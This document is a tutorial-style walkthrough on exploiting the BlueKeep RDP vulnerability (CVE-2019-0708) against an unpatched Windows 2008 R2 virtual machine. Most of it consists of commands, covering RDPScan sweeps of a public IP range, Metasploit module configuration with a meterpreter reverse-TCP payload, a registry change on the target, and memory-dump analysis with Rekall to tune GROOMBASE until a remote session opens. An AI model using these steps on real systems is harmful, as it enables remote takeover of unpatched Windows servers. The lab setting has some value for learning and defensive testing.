BlueKeep (CVE-2019-0708) is a security vulnerability that was discovered in Microsoft's Remote Desktop Protocol implementation. First reported in May 2019, it is present in all unpatched Windows NT-based versions of Microsoft Windows from Windows 2000 through Windows Server 2008 R2 and Windows 7.

Microsoft issued a security patch on 14 May 2019. On 13 August 2019, related BlueKeep security vulnerabilities, collectively named DejaBlue, were reported to affect newer Windows versions, including Windows 7 and all recent versions up to Windows 10 of the operating system, as well as the older Windows versions.

Source: Wikipedia

ANATOMY OF THE ATTACK

Remote Desktop Protocol (RDP) allows a lot of communication and interaction between the client and server prior to the user actually being authenticated. And that is exactly what BlueKeep exploited when it burst upon the scene earlier this summer.

RDP presents a remote GUI login screen in which the user can enter their username and password. It’s during the setup of that session that BlueKeep attempts to write arbitrary code into the kernel memory of the server and then trick the server into executing it.

The attack is complicated to pull off, but there are no particular prerequisites other than an unpatched Windows 7 or 2008 R2 system with RDP (usually TCP 3389) accessible to a remote attacker.

PREREQUISITES

In this article, we will see how hacker uses the BlueKeep to crash vulnerable Windows machine remotely and eventually try to inject remote code into to execute it. Before to move further and in order to be able to deploy this scenario, you will need the following to be present in your machine:

  • VirtualBox 5 or 6 which will host the vulnerable Windows Server. If you are Linux user, you may be interested in this article which explains how to install VirtualBox 6.0 in Ubuntu/Debian and other derived distributions.
  • A Vulnerable Windows Image Disk (You can download the Windows 2008 R2 in the official download page).
  • A Linux machine along with Metasploit installed (It can be a physical or a virtual machine).
  • RDPScan which will be used to scan our network and detect the CVE-2019-0708 vulnerability.
  • Rekall Memory Forensics which will be used to extract NPP address from RAM dump.
FIND VULNERABLES TARGETS USING RDPSCAN

Install RDPScan on Ubuntu/Debian and other derived distributions

git clone https://github.com/robertdavidgraham/rdpscan
cd rdpscan
sudo make

Once RDPScan is installed, you will need to run the following command to scan your network.

./rdpscan 182.253.0.1-182.253.255.255

Or to scan a whole subnet

./rdpscan 182.253.0.0/24

Output

how-hackers-exploit-bluekeep-vulnerability-to-install-cryptominer-on-windows-servers

This produces one of 3 results for each address scanned:

  • SAFE - If the target has determined bot be patched or at least require CredSSP/NLA
  • VULNERABLE - If the target has been confirmed to be vulnerable
  • UNKNOWN - If the target doesn't respond or has some protocol failure

When nothing exists at a target IP address, the older versions print the message "UNKNOWN - connection timed out". When scanning large networks, this produces an overload of too much information about systems you don't care about.

You can increase the speed at which it scans large networks by increasing the number of workers:

rdpscan --workers 10000 182.253.0.0/24

LAUNCHING THE ATTACK

If you stand here, I'm sure you'll be impatient to open your Metasploit console to test this vulnerability. We will run Exploit a first time with the common below options to see what is happening on our victim's machine.

msfconsole
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
[...]
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 192.168.1.105
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LHOST 192.168.1.102
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LPORT 4444
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
[...]
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set TARGET 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

In the above configuration, the victim machine is referenced as 192.168.1.105, the attacker machine is referenced as 192.168.1.102, we use a common reverse TCP payload made especially for Windows machine and we set the target as "1" for the moment.

Output

[*] Started reverse TCP handler on 192.168.1.102:4444
[+] 192.168.1.105:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.1.105:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 192.168.1.105:3389 - Surfing channels ...
[*] 192.168.1.105:3389 - Lobbing eggs ...
[*] 192.168.1.105:3389 - Forcing the USE of FREE\'d object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >

Well done! It seems that our Exploit has completed but no meterpreter session has been created and the only thing we have been able to do on our victim's machine it's to crash it with a horrible blue screen that must have been scaring the user who was behind the screen at this time !! It's this all what we can do ?

how-hackers-exploit-bluekeep-vulnerability-to-install-cryptominer-on-windows-servers


EXPLOITING BLUEKEEP

As explained in the Github conversation page of the project :

The module is currently ranked as Manual, as the user needs to supply additional target information or risk crashing the target host. The module implements a default fingerprint-only TARGET option that just checks for a vulnerable host and displays some initial information about the specific target OS, but the user will need to specify a more exact target based on secondary recon, or until further improvements in this module enable more accurate determination of the target kernel memory layout at runtime.

So, following the tips from klaus.hohenpoelz.de, you will at this stage start to deal with your first issue ! Let's take a moment to read the comments at the start of cve_2019_0708_bluekeep_rce.rb file that you can find on the below screenshot.

how-hackers-exploit-bluekeep-vulnerability-to-install-cryptominer-on-windows-servers


EDITING THE FDISABLECAM SETTING

Concretely that mean the current Metasploit Exploit associated to the CVE-2019-0708 currently work only if fDisableCam key is set to zero and the main problem is if the registry key still use the default setup, we cannot exploit it. So in order to move further, on the target machine, you must open the Registry Editor and set the fDisableCam key to "0" as per the below screenshots.

how-hackers-exploit-bluekeep-vulnerability-to-install-cryptominer-on-windows-servers

how-hackers-exploit-bluekeep-vulnerability-to-install-cryptominer-on-windows-servers


EXTRACT A RAM DUMP FROM THE TARGET MACHINE

As commented in the below screenshot, to move ahead we will need to get the correct GROOMBASE value which is the start address of the NonPagedPool area (NPP).

how-hackers-exploit-bluekeep-vulnerability-to-install-cryptominer-on-windows-servers

To do this, we will extract the NPP Address from a memory dump of the target machine which is quite easy to do since we host it. This operation can be done quickly if you are using VirtualBox. To do it, you need first to start your target machine (VM) and once you are ready use the following commands :

VBoxManage debugvm "VM-Name" dumpvmcore --filename=vm.memdump

GETTING THE NPP ADDRESS FROM THE RAM DUMP

We will use Rekall for this operation. But if you are expert in forensics, you can also use Volatility Framework which allow you to do the same. If Rekall is not yet installed on your machine, you can follow the below instructions. For more information about this tool, you can visit the Github page of the project.

Install/Setup Rekall Memory Forensics on Linux based from sources

sudo apt -y update
pip install virtualenv
virtualenv /tmp/MyEnv
source /tmp/MyEnv/bin/activate
git clone https://github.com/google/rekall.git rekall
pip3 install --editable rekall/rekall-lib
pip3 install --editable rekall/rekall-core
pip3 install --editable rekall/rekall-agent
pip3 install --editable rekall

Install/Setup Rekall Memory Forensics from Docker

If you prefer you can use Docker to do the work, this Dockerfile represents a Docker image that encapsulates the Rekall Memory Forensic Framework. To run this image after installing Docker, use a command like this:

sudo mkdir ~/files
sudo chmod a+xwr ~/files
sudo docker run --rm -u 0 -it -v ~/files:/home/nonroot/files remnux/rekall bash

To use Rekall's web console, invoke the container with the -p parameter to give your host access to the container's TCP port 8000 like this:

sudo docker run --rm -u 0 -it -p 8000:8000 -v ~/files:/home/nonroot/files remnux/rekall

Once you are ready with one of the above Rekall setup option, simply execute the below command in order to extract the information we need from our VM memory dump we previously created.

Usage

rekall -f /path/to/your/dump/file.memdump pools

Output

how-hackers-exploit-bluekeep-vulnerability-to-install-cryptominer-on-windows-servers

Waoohh !! It seems we finally found what we were looking for !! Highlighted we can see the "Start" address of the NonPagedPool that Rekall extracts from the memory dump of our virtual machine. We can now copy this value to edit the GROOMBASE parameter of the Metasploit exploit.


SETUP YOUR EXPLOIT

Depending on the operating system you are using, the path to your Metasploit directory may be different from the example described below. To find out the path of your Metasploit you can use the locate command.

sudo nano /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Find the below line and replace the GROOMBASE with the one you found in the previous step.

# This works with Virtualbox 6
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',
{
 'Platform' => 'win',
 'Arch' => [ARCH_X64],
 'GROOMBASE' => 0xfffffa8001804000
}

Important: Rekall removes four 'f' at the beginning of the address string so you must add it manually in order to get 18 characters of length. When you are done with your file, use CTRL + x to save it, then reload all Metasploit modules using the below command.

msf5 > reload_all

You are all done !! You can start over the process of your attack on Metasploit as you did earlier but now we will also specify the GROOMSIZE value.

msfconsole
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 192.168.1.105
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LHOST 192.168.1.102
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LPORT 4444
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set TARGET 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 200
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

Output

how-hackers-exploit-bluekeep-vulnerability-to-install-cryptominer-on-windows-servers

As you can see on the above screenshot, a Meterpreter session was created allowing me now to do whatever I want on my victim's machine. Regarding the GROOMSIZE, I personally used 200MB since my VM is running 2 processors with 4GB of ram. But for a common virtual machine of 2GB of RAM running on one proc, the correct value could be around 50MB.